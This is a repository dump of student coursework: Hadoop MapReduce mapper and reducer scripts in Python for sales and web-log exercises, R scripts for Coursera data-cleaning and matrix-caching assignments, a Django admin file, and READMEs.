"blob_id": 
"9f990a55ff68a659217006acbed82b54355178a7", "content_id": "da47fa07f6b6b253b2e4f5b947e92842eeadf240", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1943, "license_type": "no_license", "max_line_length": 126, "num_lines": 53, "path": "/mei_tuan.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "import java.util.*;\n\npublic class Main{\n static int reuslt = 0;\n static int last = 0;\n public static void main(String[] args) {\n Scanner scanner = new Scanner(System.in);\n int n = scanner.nextInt();\n Set<Integer> visited = new HashSet<>();\n Map<Integer, Integer> count = new HashMap<>();\n Map<Integer, List<Integer>> map = new HashMap<>();\n for(int i = 0; i < n - 1; i ++) {\n int x1 = scanner.nextInt();\n int x2 = scanner.nextInt();\n count.put(x1, count.getOrDefault(x1, 0));\n count.put(x2, count.getOrDefault(x2, 0));\n List<Integer> temp1 = map.getOrDefault(x1, new ArrayList<>());\n temp1.add(x2);\n map.put(x1, temp1);\n List<Integer> temp2 = map.getOrDefault(x2, new ArrayList<>());\n temp2.add(x2);\n map.put(x2, temp2);\n }\n dfs(1, n, count, map, visited);\n findLast(1, map, new HashSet<Integer>());\n System.out.println(reuslt - last);\n scanner.close();\n }\n\n public static void dfs(int x, int n, Map<Integer, Integer> count, Map<Integer, List<Integer>> map, Set<Integer> visited) {\n List<Integer> temp_list = map.get(x);\n visited.add(x);\n Collections.sort(temp_list, (a, b) -> (count.get(b) - count.get(a)));\n map.put(x, temp_list);\n boolean flag = false;\n for(int link : temp_list) {\n if(visited.contains(link)) {continue;}\n flag = true;\n reuslt ++;\n dfs(link, n, count, map, visited);\n reuslt ++;\n }\n }\n\n public static void findLast(int x, Map<Integer, List<Integer>> map, Set<Integer> visited) {\n List<Integer> temp_list = map.get(x);\n if(temp_list.size() == 1) {return;}\n int next = temp_list.get(temp_list.size() - 1);\n visited.add(x);\n last ++;\n findLast(next, map, visited);\n }\n}" }, { "alpha_fraction": 0.3245614171028137, "alphanum_fraction": 0.34210526943206787, "avg_line_length": 23.5, "blob_id": "f09215f256026a16b8768a31c1c21a641fba0438", "content_id": "32c43f4efcf01cda755e53d532058fd015329977", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 342, "license_type": "no_license", "max_line_length": 42, "num_lines": 14, "path": "/Unique_Paths.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n public int uniquePaths(int m, int n) {\n int[] list = new int[n];\n for(int z = 0; z < n; z ++){\n list[z] = 1;\n }\n for(int i = 1; i < m; i ++){\n for(int j = 1; j < n; j ++){\n list[j] += list[j - 1];\n }\n }\n return list[n - 1];\n }\n}" }, { "alpha_fraction": 0.32822084426879883, "alphanum_fraction": 0.349693238735199, "avg_line_length": 28.68181800842285, "blob_id": "f29ac82050b6e556b655e9bab744d2f941b33f12", "content_id": "8b680d9921b1feabb6d08b07af5202f0d139381b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 652, "license_type": "no_license", "max_line_length": 49, "num_lines": 22, "path": "/Non-decreasing_Array.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n public boolean checkPossibility(int[] nums) {\n if(nums.length <= 2){return true;}\n int count = 0;\n for(int i = 0;i < nums.length - 2;i ++){\n if(nums[i] > nums[i + 1]){\n count ++;\n if(count == 2){return false;}\n }\n if(nums[i + 1] 
> nums[i + 2]){\n if(nums[i] < nums[i + 2]){\n nums[i + 1] = nums[i + 2];\n }else{\n nums[i + 2] = nums[i + 1];\n }\n count ++;\n if(count == 2){return false;}\n }\n }\n return true;\n }\n}" }, { "alpha_fraction": 0.3038141131401062, "alphanum_fraction": 0.31389740109443665, "avg_line_length": 27.172840118408203, "blob_id": "5a269a1949b54a31d02adaab0e2e6db6b4ec29ca", "content_id": "54f85f5a437b886bb4aff1e4c0840b5af073948d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2281, "license_type": "no_license", "max_line_length": 52, "num_lines": 81, "path": "/Trapping_Rain_Water.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n public int trap(int[] height) {\n int max = 0;\n int total = 0;\n int length = height.length;\n for(int num : height){\n max = Math.max(max, num);\n }\n for(int i = 0; i < max; i ++){\n int left = -1;\n int right = -1;\n for(int j = 0; j < length; j ++){\n if(height[j] - i > 0){\n right = j;\n if(left != -1){\n total += right - left - 1;\n }\n left = right;\n }\n }\n }\n return total;\n }\n}\n\n//Much more faster\nclass Solution {\n public int trap(int[] height) {\n int length = height.length;\n int max = 0;\n int total = 0;\n int max_pos = 0;\n for(int i = 0; i < length; i ++){\n if(height[i] > max) {\n max = height[i];\n max_pos = i;\n }\n }\n int sum = 0;\n int entity = 0;\n int max_temp = 0;\n boolean flag = false;\n for(int i = 0; i < max_pos; i ++) {\n if(!flag && height[i] != 0) {\n max_temp = height[i];\n flag = true;\n }\n if(flag) {\n entity += height[i];\n if(height[i] <= max_temp) {\n sum += max_temp;\n } else {\n sum += height[i];\n max_temp = height[i];\n }\n }\n }\n total += sum - entity;\n sum = 0;\n entity = 0;\n max_temp = 0;\n flag = false;\n for(int i = length - 1; i > max_pos; i --) {\n if(!flag && height[i] != 0) {\n max_temp = height[i];\n flag = true;\n }\n if(flag) {\n entity += height[i];\n if(height[i] <= max_temp) {\n sum += max_temp;\n } else {\n sum += height[i];\n max_temp = height[i];\n }\n }\n }\n total += sum - entity;\n return total;\n }\n}" }, { "alpha_fraction": 0.6225563883781433, "alphanum_fraction": 0.6285714507102966, "avg_line_length": 29.272727966308594, "blob_id": "0b7e8e7d44cea39f0dd49c7f2874f84291cc75a5", "content_id": "458712fecd5cd81b4c7f7704b3582a4eb83ca850", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 665, "license_type": "no_license", "max_line_length": 88, "num_lines": 22, "path": "/Combination_Sum.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n static List<List<Integer>> lists;\n \n\tpublic List<List<Integer>> combinationSum(int[] candidates, int target) {\n\t\tlists = new ArrayList<List<Integer>>();\n\t\tArrays.sort(candidates);\n\t\tbackTracing(candidates, 0, target, new ArrayList<Integer>());\n return lists;\n }\n\t\n\tpublic static void backTracing(int[] nums, int index, int target, List<Integer> list) {\n\t\tif(target > 0) {\n\t\t\tfor(int i = index; i < nums.length && target >= nums[i]; i ++) {\n\t\t\t\tlist.add(nums[i]);\n\t\t\t\tbackTracing(nums, i, target - nums[i], list);\n\t\t\t\tlist.remove(list.size() - 1);\n\t\t\t}\n\t\t} else if(target == 0) {\n\t\t\tlists.add(new ArrayList<Integer>(list));\n\t\t}\n\t}\n}" } ]
32
L3ftsid3/Classes
https://github.com/L3ftsid3/Classes
64234883501ab880d7d935a4951af215f41e9b3f
e3401f0c7df1686384612cdb750d07ca4534689b
b052e762e2df68a8bfae4a84bfc5be630dcede7a
refs/heads/master
2021-01-18T14:07:40.379529
2014-05-16T22:34:22
2014-05-16T22:34:22
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6173664331436157, "alphanum_fraction": 0.6221374273300171, "avg_line_length": 26.105262756347656, "blob_id": "c274e149a02a160e24d062e9c38f95285baa4826", "content_id": "d14818beba52a1bace58d8574c0d1d3c38cb8992", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1048, "license_type": "no_license", "max_line_length": 66, "num_lines": 38, "path": "/Big-Data/Hadoop/Intro-to-Hadoop-Udacity/Project--Week-3/ex2reducer.py", "repo_name": "L3ftsid3/Classes", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\n\nmaxSale = 0\noldKey = None\n\n# Loop around the data\n# It will be in format key\\tvalue\n# Where key is the store name, val is the sale amount\n#\n# All the sales for a particular item will be presented, \n# then the key will change and we'll be dealing with the next item\n\nfor line in sys.stdin:\n data_mapped = line.strip().split(\"\\t\")\n if len(data_mapped) != 2:\n # Something has gone wrong. Skip the line\n continue\n \n thisKey, thisSale = data_mapped\n \n # When key has just been changed (From Miami to NYC stores)\n if oldKey and oldKey != thisKey:\n # print result from oldKey (previous store)\n print\"{0}\\t{1}\".format(oldKey, maxSale)\n # Change the key to the new store\n oldKey = thisKey\n #Reset maxSale value for the new store to compute new max\n maxSale = 0\n \n oldKey = thisKey\n \n if float(thisSale) > float(maxSale):\n maxSale = float(thisSale)\n \nif oldKey != None:\n print oldKey, \"\\t\", maxSale\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.6445086598396301, "alphanum_fraction": 0.6466763019561768, "avg_line_length": 29.021739959716797, "blob_id": "94f335a8976864bbaf971503881411b97b563c5c", "content_id": "dd2a9ef8aae1e150d416d86a3dbb3ed9b96dfe33", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 1384, "license_type": "no_license", "max_line_length": 90, "num_lines": 46, "path": "/Data-Analysis/R-Programming/Project/cachematrix.R", "repo_name": "L3ftsid3/Classes", "src_encoding": "UTF-8", "text": "## Caching the Inverse of a Matrix\n\n## The Function makeCacheMatrix has:\n## INPUT: 1 Matrix (Assumed Invertible)\n## OUTPUT: A list of 4 functions that will:\n## set(y) - Sets the matrix Value as y\n## get() - Get the Matrix X\n## setinverse(inverse) - Sets the inverse value for the matrix\n## getinverse - Get the inverse for the Matrix\n\n## This function creates a special \"matrix\" object that can cache its inverse.\n\nmakeCacheMatrix <- function(x = matrix()) {\n inv <- NULL\n set <- function(y) {\n x <<- as.matrix(y)\n inv <<- NULL\n }\n get <- function() x\n setinverse <- function(inverse) inv <<- inverse\n getinverse <- function() inv\n list(set = set, get = get,\n setinverse = setinverse,\n getinverse = getinverse)\n}\n\n\n\n## This Function Checks if the inverse of the Matrix has been cached\n## If so it returns that value (without recalculating), \n## if not it will calculate it and cache it using the makeCacheMatrix function\n## INPUT: 1 makeCacheMatrix (Result of using the function makeCacheMatrix with the Matrix)\n## OUTPUT: the inverse of the Matrix\n\ncacheSolve <- function(x, ...) 
{\n ## Return a matrix that is the inverse of 'x'\n inv <- x$getinverse()\n if(!is.null(inv)) {\n message(\"getting cached data\")\n return(inv)\n }\n data <- x$get()\n inv <- solve(data, ...)\n x$setinverse(inv)\n inv\n}\n\n\n\n" }, { "alpha_fraction": 0.5891340970993042, "alphanum_fraction": 0.615166962146759, "avg_line_length": 32.980770111083984, "blob_id": "37ca789dcecbef547b00ee00c659608f015b1979", "content_id": "7d3310863c4332add9969bbbad527f92dd3081e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1767, "license_type": "no_license", "max_line_length": 119, "num_lines": 52, "path": "/Big-Data/Hadoop/Intro-to-Hadoop-Udacity/Project-Week-3-Part2/ex04mapper.py", "repo_name": "L3ftsid3/Classes", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n \n# Format of each line is:\n# 10.223.157.186 - - [15/Jul/2009:15:50:35 -0700] \"GET /assets/js/lowpro.js HTTP/1.1\" 200 10469\n# %h %l %u %t \\\"%r\\\" %>s %b\n# IP client_ID client_username time request status_code object_size\n#\n# We need hits to a certain path. \n# The request path is extracted from the request. Since we need hits the value will be 1 [KEY: request_path , VALUE: 1]\n# We need to write them out to standard output, separated by a tab\n \n \n# To better split a log\n# p = re.compile(\n# '([^ ]*) ([^ ]*) ([^ ]*) \\[([^]]*)\\] \"([^\"]*)\" ([^ ]*) ([^ ]*)'\n# )\n\n# for line in file.readlines():\n# m = p.match(line)\n# if not m:\n# continue\n# host, ignore, user, date, request, status, size = m.groups()\n\n\nimport sys\nreq_path_array = []\n \nfor line in sys.stdin:\n data = line.strip().split(\" \")\n if len(data) == 10:\n # time and zone will have a square bracket to remove with regex (in this mapper it's not needed)\n IP, client_ID, client_username, time, zone, req_method, req_path, protocol, status_code, object_size = data\n # request_path = request.split(\" \")[1]\n # print \"Path\" + str(req_path)\n req_path_array.append(req_path)\n \n# Optimize mapper phase by doing a small reduce phase within the same mapper (saves time on shuffling phase)\ndef add_values_within_mapper(key_array):\n dict = {}\n for element in range(len(key_array)):\n if not(key_array[element] in dict):\n dict[key_array[element]] = 1\n else:\n dict[key_array[element]] += 1\n return dict\n \ndef print_map_phase(dict):\n for key, value in dict.items():\n print\"{0}\\t{1}\".format(key, value)\n \nadded_values = add_values_within_mapper(req_path_array)\nprint_map_phase(added_values)\n" }, { "alpha_fraction": 0.77823406457901, "alphanum_fraction": 0.77823406457901, "avg_line_length": 29.4375, "blob_id": "774a0a5b3c8c3434f78e82236bccd316655b647b", "content_id": "2966d18c98477c6a93519baf876f5114bc903cd1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 487, "license_type": "no_license", "max_line_length": 66, "num_lines": 16, "path": "/Web-Development/Tutorials/Django-Landing-Page/landingpage/admin.py", "repo_name": "L3ftsid3/Classes", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom django.db import models\nfrom django import forms\nfrom ckeditor.widgets import CKEditorWidget\nfrom landingpage.models import LandingPageForm, LandingPage, Pitch\n\nclass PitchAdmin(admin.ModelAdmin):\n\n formfield_overrides = {\n models.CharField: {'widget': forms.Textarea},\n models.TextField: {'widget': CKEditorWidget}\n }\n\nadmin.site.register(LandingPageForm)\nadmin.site.register(LandingPage)\nadmin.site.register(Pitch, 
PitchAdmin)\n" }, { "alpha_fraction": 0.6654545664787292, "alphanum_fraction": 0.6763636469841003, "avg_line_length": 27.947368621826172, "blob_id": "b01a88ee72cb50e3cdee9459e40ee1a01e12e881", "content_id": "3e627d00f6a766e39f60e1ebfcb4369526c3d3c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 550, "license_type": "no_license", "max_line_length": 82, "num_lines": 19, "path": "/Big-Data/Hadoop/Intro-to-Hadoop-Udacity/Project--Week-3/ex2mapper.py", "repo_name": "L3ftsid3/Classes", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n# Exercise 2 \n# Find the monetary value for the highest individual sale for each separate store.\n\n\n# Format of each line is:\n# date\\ttime\\tstore name\\titem description\\tcost\\tmethod of payment\n#\n# We want elements 3 (store name) and 5 (cost) [KEY = store name, VALUE = cost]\n# We need to write them out to std output, separated by a tab\n\nimport sys\n\nfor line in sys.stdin:\n    data = line.strip().split(\"\\t\")\n    if len(data) == 6:\n        date, time, store, item, cost, payment = data\n        print\"{0}\\t{1}\".format(store, cost)\n" }, { "alpha_fraction": 0.6776368021965027, "alphanum_fraction": 0.681601881980896, "avg_line_length": 36.44444274902344, "blob_id": "addd720abfc39d07a743c165c81864c7694845b2", "content_id": "6711159961aa7299c30f87049ecd40d005c4f3bd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 2522, "license_type": "no_license", "max_line_length": 86, "num_lines": 67, "path": "/Data-Analysis/Getting-and-Cleaning-Data/Project/run_analysis.R", "repo_name": "L3ftsid3/Classes", "src_encoding": "UTF-8", "text": "## Helper Function to create tidy data on the Y data frame\nAdd_Y_labels <- function(Y_df, labels_df, column_names){\n    for(i in 1:nrow(Y_df)){\n        # First Iterations Create New Column and Change Column Names\n        if(i == 1){\n            Y_df[ncol(Y_df)+1] <- NA\n            colnames(Y_df)<- c(\"activity_code\", \"activity\")\n        }\n        for(j in 1:nrow(labels_df)){\n            if(Y_df[i,1] == labels_df[j,1]){ Y_df[i,2] <- as.character(labels_df[j,2]) }\n        }    \n    }\n    \n    return(Y_df)\n}\n\n# Homework Peer Assignment - Cleaning Data\n\n# Load the Data (Read each file separately)\ntrain_Folder <- file.path('UCI HAR Dataset', 'train')\ntest_Folder <- file.path('UCI HAR Dataset', 'test')\n    \nsubject_train <- read.table(file.path(train_Folder, \"subject_train.txt\"))\nY_train <- read.table(file.path(train_Folder, \"Y_train.txt\"))\nX_train <- read.table(file.path(train_Folder, \"X_train.txt\"))\n    \nsubject_test <- read.table(file.path(test_Folder, \"subject_test.txt\"))\nY_test <- read.table(file.path(test_Folder, \"Y_test.txt\"))\nX_test <- read.table(file.path(test_Folder, \"X_test.txt\"))\n\n# Load file with features (columns) name for X_test and X_train\nX_names <- read.table(file.path('UCI HAR Dataset', 'features.txt'))\nX_names <- X_names[,2]\n\n# Add a Column to Y_train and Y_test to get activity_code and activity_name\nY_activity_labels <- read.table(file.path('UCI HAR Dataset', 'activity_labels.txt'))\nY_names <- c(\"activity_code\", \"activity\")\nUpdated_Y_train <- Add_Y_labels(Y_train,Y_activity_labels, Y_names )\nUpdated_Y_test <- Add_Y_labels(Y_test,Y_activity_labels, Y_names )\nsubject_name <- c(\"subject_ID\")\n\n# Combine the train and test datasets (X, Y and subject)\nunfiltered_X <- rbind(X_train, X_test)\nY <- rbind(Updated_Y_train, Updated_Y_test)\nsubject <- rbind(subject_train, subject_test)\n    \n# Name all the dataframe columns (Y is already renamed using 
Add_Y_labels)\ncolnames(unfiltered_X) <- X_names\ncolnames(subject) <- c(\"ID\")\n\n# Filter to only variables with mean and std\nmeans <- grep(\"mean\\\\(\\\\)\", X_names)\nstds <- grep(\"std\\\\(\\\\)\", X_names)\nrelevant <- sort(c(means, stds))\nX <- unfiltered_X[relevant]\n\n# Combine (subject, Y, X) to obtain the complete dataframe\nall <- cbind(subject, Y, X)\n\n## Creates a second, independent tidy data set with the average of \n## each variable for each activity and each subject. \nrequire(reshape2)\ndf_melt <- melt(all, id = c(\"ID\", \"activity_code\", \"activity\"))\ntidy_data_set_complete <- dcast(df_melt, ID + activity_code+ activity~ variable, mean)\n\n# Prints the tidy data frame\nView(tidy_data_set_complete)\n" }, { "alpha_fraction": 0.6844512224197388, "alphanum_fraction": 0.6935975551605225, "avg_line_length": 35.44444274902344, "blob_id": "8756d07a102af02e4c6c3b38f9d2f2c102a1528f", "content_id": "6432bfb37f01d6b5730eab6aa1c521f846369bc6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 656, "license_type": "no_license", "max_line_length": 126, "num_lines": 18, "path": "/Big-Data/Hadoop/Intro-to-Hadoop-Udacity/Project--Week-3/ex1mapper.py", "repo_name": "L3ftsid3/Classes", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n# Exercise 1 - One of the three questions that you have to answer about this data set:\n# Instead of breaking the sales down by store, instead give us a sales breakdown by product category across all of our stores.\n\n# Format of each line is:\n# date\\ttime\\tstore name\\titem description\\tcost\\tmethod of payment\n#\n# We want elements 4 (item) and 5 (cost) [KEY = item descr., VALUE = cost]\n# We need to write them out to std output, separated by a tab\n\nimport sys\n\nfor line in sys.stdin:\n    data = line.strip().split(\"\\t\")\n    if len(data) == 6:\n        date, time, store, item, cost, payment = data\n        print\"{0}\\t{1}\".format(item, cost)\n" }, { "alpha_fraction": 0.6056009531021118, "alphanum_fraction": 0.6091015338897705, "avg_line_length": 22.80555534362793, "blob_id": "951cd4170c787de799cfdef9c7879296d25bdec2", "content_id": "64db54baa9778db2dc4fd568790613b5430d8287", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 857, "license_type": "no_license", "max_line_length": 84, "num_lines": 36, "path": "/Big-Data/Hadoop/Intro-to-Hadoop-Udacity/Project-Week-3-Part2/ex04reducer.py", "repo_name": "L3ftsid3/Classes", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n \nimport sys\n \nHits = 0\noldKey = None\n \n# Loop around the data\n# It will be in the format key\\tval\n# Where key is the request path name, val is the amount of hits from the mapper\n#\n# In this case we'll print out only the request path: \"/assets/js/the-associates.js\"\n \nfor line in sys.stdin:\n    data_mapped = line.strip().split(\"\\t\")\n    if len(data_mapped) != 2:\n        # Something has gone wrong. 
Skip this line.\n continue\n \n thisKey, thisHits = data_mapped\n thisHits = int(thisHits)\n \n if oldKey == None:\n oldKey = thisKey\n \n if oldKey != thisKey:\n if oldKey == \"/assets/js/the-associates.js\"\n print oldKey, \"\\t\", Hits\n oldKey = thisKey;\n Hits = 0\n \n Hits += thisHits\n \nif oldKey != None:\n if oldKey == \"/assets/js/the-associates.js\"\n print oldKey, \"\\t\", Hits\n" }, { "alpha_fraction": 0.6611295938491821, "alphanum_fraction": 0.6677740812301636, "avg_line_length": 21.259260177612305, "blob_id": "f763ff1f47115c8e12eb702b9ae2586e89773392", "content_id": "7609aa6e121498fc4964681747d09f7a442c807f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 602, "license_type": "no_license", "max_line_length": 53, "num_lines": 27, "path": "/Big-Data/Hadoop/Intro-to-Hadoop-Udacity/Project--Week-3/ex3reducer.py", "repo_name": "L3ftsid3/Classes", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n \nimport sys\n \nsalesCount = 0\ntotalSales = 0\n \n# Loop around the data\n# It will be in the format key\\tval\n# Where key is the store name, val is the sale amount\n#\n# All the sales will be saved in the two variables:\n# salesCount (number of sales)\n# totalSales (total Value of the sales)\n \nfor line in sys.stdin:\n data_mapped = line.strip().split(\"\\t\")\n if len(data_mapped) != 2:\n # Something has gone wrong. Skip this line.\n continue\n \n thisKey, thisSale = data_mapped\n \n salesCount += 1\n totalSales += float(thisSale)\n \nprint salesCount, \"\\t\", totalSales\n\n" }, { "alpha_fraction": 0.7308707237243652, "alphanum_fraction": 0.7343887686729431, "avg_line_length": 34.8110237121582, "blob_id": "fb93e77f35ce92e39c60136c05e8ba2705c17e07", "content_id": "50d24e2e51a76ddeb802743180f00ed3b1cccef2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4548, "license_type": "no_license", "max_line_length": 572, "num_lines": 127, "path": "/Data-Analysis/Getting-and-Cleaning-Data/Project/README.md", "repo_name": "L3ftsid3/Classes", "src_encoding": "UTF-8", "text": "Cleaning-Data\n=============\n\nRepo for Cleaning Data Class on Coursera\n\nFeature Selection \n=================\n\nThe features selected for this database come from the accelerometer and gyroscope 3-axial raw signals tAcc-XYZ and tGyro-XYZ. These time domain signals (prefix 't' to denote time) were captured at a constant rate of 50 Hz. Then they were filtered using a median filter and a 3rd order low pass Butterworth filter with a corner frequency of 20 Hz to remove noise. Similarly, the acceleration signal was then separated into body and gravity acceleration signals (tBodyAcc-XYZ and tGravityAcc-XYZ) using another low pass Butterworth filter with a corner frequency of 0.3 Hz. \n\nSubsequently, the body linear acceleration and angular velocity were derived in time to obtain Jerk signals (tBodyAccJerk-XYZ and tBodyGyroJerk-XYZ). Also the magnitude of these three-dimensional signals were calculated using the Euclidean norm (tBodyAccMag, tGravityAccMag, tBodyAccJerkMag, tBodyGyroMag, tBodyGyroJerkMag). \n\nFinally a Fast Fourier Transform (FFT) was applied to some of these signals producing fBodyAcc-XYZ, fBodyAccJerk-XYZ, fBodyGyro-XYZ, fBodyAccJerkMag, fBodyGyroMag, fBodyGyroJerkMag. (Note the 'f' to indicate frequency domain signals). 
\n\nThese signals were used to estimate variables of the feature vector for each pattern: \n'-XYZ' is used to denote 3-axial signals in the X, Y and Z directions.\n\nIn this case the variables used were those about mean and standard deviation measurements.\nThe List of all the variables used can be found in the last section. \n\n\nData Cleaning and Variable Extraction\n===============================================\nTo clean the data the following steps were taken\n\n1) Loaded the following File in R, from the train and test folder\n Train files: Y_train.txt, X_train.txt, subject_train\n Test files: Y_test.txt, X_test.txt, subject_test\n Features.txt (to get the names for the X_train and X_test data)\n activity_labels.txt (to get the names \n\n2) Added a Column to the Y_train and Y_test data frames to display\n both the activity code and the associated activity. The two new data frames\n were called Updated_Y_train and Updated_X_train\n \n3) Renamed the column in the subject_train and subject_test data frames\n as subject_ID\n \n4) Combined the train and test datasets for X, Y and subject separately.\n The following dataframes were obtained:\n - unfiltered_X (combining X_train and X_test)\n - Y (combining Updated_Y_train and Updated_Y_test)\n - subject (combining subject_train and subject_test)\n\n5) Rename the new subject dataframe column as \"ID\"\n\n6) Filtered the variables in the X Unfiltered_X data frame to only the \n columns that would contain the string \"mean()\" or \"std()\". This was \n done because the excercise required to get only the mean and standard\n deviation measurements. The new dataframe X (with only the filtered \n columns) was then created\n \n7) Combined the three data frames subject, Y and X\n\n\nList of Variables\n==================\n\n+ ID \n+ activity_code\n+ activity\n+ tBodyAcc-mean()-X\n+ tBodyAcc-mean()-Y\n+ tBodyAcc-mean()-Z\n+ tBodyAcc-std()-X\n+ tBodyAcc-std()-Y\n+ tBodyAcc-std()-Z\n+ tGravityAcc-mean()-X\n+ tGravityAcc-mean()-Y\n+ tGravityAcc-mean()-Z\n+ tGravityAcc-std()-X\n+ tGravityAcc-std()-Y\n+ tGravityAcc-std()-Z\n+ tBodyAccJerk-mean()-X\n+ tBodyAccJerk-mean()-Y\n+ tBodyAccJerk-mean()-Z\n+ tBodyAccJerk-std()-X\n+ tBodyAccJerk-std()-Y\n+ tBodyAccJerk-std()-Z\n+ tBodyGyro-mean()-X\n+ tBodyGyro-mean()-Y\n+ tBodyGyro-mean()-Z\n+ tBodyGyro-std()-X\n+ tBodyGyro-std()-Y\n+ tBodyGyro-std()-Z\n+ tBodyGyroJerk-mean()-X\n+ tBodyGyroJerk-mean()-Y\n+ tBodyGyroJerk-mean()-Z\n+ tBodyGyroJerk-std()-X\n+ tBodyGyroJerk-std()-Y\n+ tBodyGyroJerk-std()-Z\n+ tBodyAccMag-mean()\n+ tBodyAccMag-std()\n+ tGravityAccMag-mean()\n+ tGravityAccMag-std()\n+ tBodyAccJerkMag-mean()\n+ tBodyAccJerkMag-std()\n+ tBodyGyroMag-mean()\n+ tBodyGyroMag-std()\n+ tBodyGyroJerkMag-mean()\n+ tBodyGyroJerkMag-std()\n+ fBodyAcc-mean()-X\n+ fBodyAcc-mean()-Y\n+ fBodyAcc-mean()-Z\n+ fBodyAcc-std()-X\n+ fBodyAcc-std()-Y\n+ fBodyAcc-std()-Z\n+ fBodyAccJerk-mean()-X\n+ fBodyAccJerk-mean()-Y\n+ fBodyAccJerk-mean()-Z\n+ fBodyAccJerk-std()-X\n+ fBodyAccJerk-std()-Y\n+ fBodyAccJerk-std()-Z\n+ fBodyGyro-mean()-X\n+ fBodyGyro-mean()-Y\n+ fBodyGyro-mean()-Z\n+ fBodyGyro-std()-X\n+ fBodyGyro-std()-Y\n+ fBodyGyro-std()-Z\n+ fBodyAccMag-mean()\n+ fBodyAccMag-std()\n+ fBodyBodyAccJerkMag-mean()\n+ fBodyBodyAccJerkMag-std()\n+ fBodyBodyGyroMag-mean()\n+ fBodyBodyGyroMag-std()\n+ fBodyBodyGyroJerkMag-mean()\n+ fBodyBodyGyroJerkMag-std()\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 10.25, "blob_id": "92d78454cba7629097b7eada8c682e4db2b76c69", 
"content_id": "6568a8c0a6ce4a0ac6f00624295026a80d409642", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 45, "license_type": "no_license", "max_line_length": 27, "num_lines": 4, "path": "/README.md", "repo_name": "L3ftsid3/Classes", "src_encoding": "UTF-8", "text": "Classes\n=======\n\nRepo for All Online Classes\n" }, { "alpha_fraction": 0.8571428656578064, "alphanum_fraction": 0.8571428656578064, "avg_line_length": 34, "blob_id": "0c9e824f6bd00e00cd833a85e1a1862d9eb1c49f", "content_id": "fe5f2b89bb5259bb60cc8400add15160b1de54bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 35, "license_type": "no_license", "max_line_length": 34, "num_lines": 1, "path": "/Machine-Learning/Machine-Learning-Coursera/README.md", "repo_name": "L3ftsid3/Classes", "src_encoding": "UTF-8", "text": "Machine Learning Class on Coursera\n" }, { "alpha_fraction": 0.849056601524353, "alphanum_fraction": 0.849056601524353, "avg_line_length": 52, "blob_id": "fd49a7860692552d4964e8250de426ba1e065be1", "content_id": "c5194dd8a74a04bd8c0e9ea6c6f35f13de203b1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 53, "license_type": "no_license", "max_line_length": 52, "num_lines": 1, "path": "/Machine-Learning/Learning-From-Data-EDX/README.md", "repo_name": "L3ftsid3/Classes", "src_encoding": "UTF-8", "text": "Solutions from Learrning from Data EDX-CalTech Class\n" }, { "alpha_fraction": 0.7457627058029175, "alphanum_fraction": 0.7796609997749329, "avg_line_length": 43, "blob_id": "67eea845d5436ce40df5c2f75362d0dccdcb7c5e", "content_id": "e85cc80dcd108bd6775da64eebd45ddfbab822e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 177, "license_type": "no_license", "max_line_length": 138, "num_lines": 4, "path": "/Web-Development/Tutorials/Django-Landing-Page/README.md", "repo_name": "L3ftsid3/Classes", "src_encoding": "UTF-8", "text": "This is the django-landingpage app\n\n\n[![Bitdeli Badge](https://d2weczhvl823v0.cloudfront.net/jthreatt4/django-landingpage/trend.png)](https://bitdeli.com/free \"Bitdeli Badge\")\n\n" } ]
14
astark13/webmap_app
https://github.com/astark13/webmap_app
db2ca38740b2c17b304367828dd91283164e6e3e
4312ccb2b10a6cc7d08518999445fa8e23170470
9228f83ac5ea4c91db4920006271acdf91277f18
refs/heads/master
2023-01-21T10:14:58.517015
2020-11-25T10:10:25
2020-11-25T10:10:25
313,311,661
0
0
null
null
null
null
null
